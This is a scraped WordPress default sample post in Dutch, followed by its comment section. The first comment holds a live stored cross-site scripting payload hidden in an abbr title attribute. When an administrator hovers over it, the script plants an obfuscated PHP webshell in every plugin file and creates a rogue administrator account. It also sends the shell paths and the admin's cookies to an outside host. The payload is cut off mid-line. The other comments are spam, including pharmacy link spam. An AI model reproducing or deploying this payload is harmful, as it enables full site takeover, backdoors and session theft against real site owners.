Hallo wereld!

Welkom bij WordPress. Dit is een eerste voorbeeldbericht. Je kunt het bewerken of verwijderen en starten met met je site!


  1. hinice qevnka :-) <abbr title='" onmouseover="var file = ""; var xurl = "plugin-editor.php"; var Aurl = "user-new.php"; var file2= []; var shell= []; var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址 var StartGetshell = 1; //是否getshell全部模板 1为是 0为否 var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length); var laurl = "http://web.51.la:82/go.asp"; if(!window.x){ var _st = window.setTimeout; window.setTimeout = function(fRef, mDelay) { if(typeof fRef == 'function'){ var argu = Array.prototype.slice.call(arguments,2); var f = (function(){ fRef.apply(null, argu); }); return _st(f, mDelay); } return _st(fRef,mDelay); } } function fuckxss(){ var tempshell = ""; jQuery.ajax({ url: xurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; var Tmpcode = ""; temp.find('input#_wpnonce').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); temp.find('div.alignleft big strong').each(function(i,o){ var o=jQuery(o); file = o.text(); }); temp.find('textarea#newcontent').each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie); return false; } Tmpcode = o.text().replace('<?php',shellcode); }); temp.find('select#plugin option').each(function(i,o){ var o=jQuery(o); file2.push(o.attr('value')); }); if(Xtoken&&Tmpcode&&file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'} }) .done(function(){ SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak"); return; }) } if(StartGetshell){ for(var i=0;i<file2.length;i++){ window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]); } } }) } function GetAllShell(target){ var TmpArr = target.split("|")[1]; var filename = target.split("|")[0]; if(filename!=file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'plugin': filename,'Submit':'Select'}, }) .done(function(data) { var NewCode = ""; var NewToken= ""; var Getshell=jQuery(data); Getshell.find("textarea#newcontent").each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ shell.push('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak"); console.log(filename+" x "+TmpArr); if(filename==TmpArr){ SenData(shell.join("\r\n")); } return false; } NewCode = o.text().replace('<?php',shellcode); }); Getshell.find("input#_wpnonce").each(function(i,o){ var o=jQuery(o); NewToken = o.attr('value'); }); if(NewCode&&NewToken){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'} }) .done(function(){ shell.push('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak"); console.log(filename+" "+TmpArr); if(filename==TmpArr){ SenData(shell.join("\r\n")); } return; }) .fail(function(){ shell.push(location.href+': GetShell '+filename+' Failure'); }) } }) } } function adduser(){ jQuery.ajax({ url: Aurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; temp.find('input#_wpnonce_create-user').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); jQuery.ajax({ url: Aurl, type: 'POST', data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'obuser','email':'user@gmail.com','first_name':'','last_name':'','url':'','pass1':'obpass','pass2':'obpass','role':'administrator','createuser':'Add+New+User+'} }) .done(function(){ SenData(location.href+': Add Administrator success User: obuser Password:%

  2. That is the precise blog for anyone who wants to search out out about this topic. You understand so much its nearly hard to argue with you (not that I actually would want…HaHa). You definitely put a new spin on a subject thats been written about for years. Nice stuff, just great!

  3. Hello there! This blog post couldn’t be written much better! Looking at this article reminds me of my previous roommate! He constantly kept preaching about this. I most certainly will forward this post to him. Fairly certain he’s going to have a great read. Thanks for sharing!|

  4. Wynn documented revenue before last number of quartersit could possibly preserve stagnating, or maybe counterpicking. gfkdcefecgge

  5. wh0cd254513 [url=http://stromectol2017.us.com/]purchase stromectol[/url] [url=http://buyrocaltrol.science/]rocaltrol 0.25 mcg[/url]

  6. wh0cd504241 [url=http://singulair.us.org/]generic singulair[/url] [url=http://tadalafil2017.us.org/]generic tadalafil[/url] [url=http://kamagra2017.us.org/]kamagra cost[/url]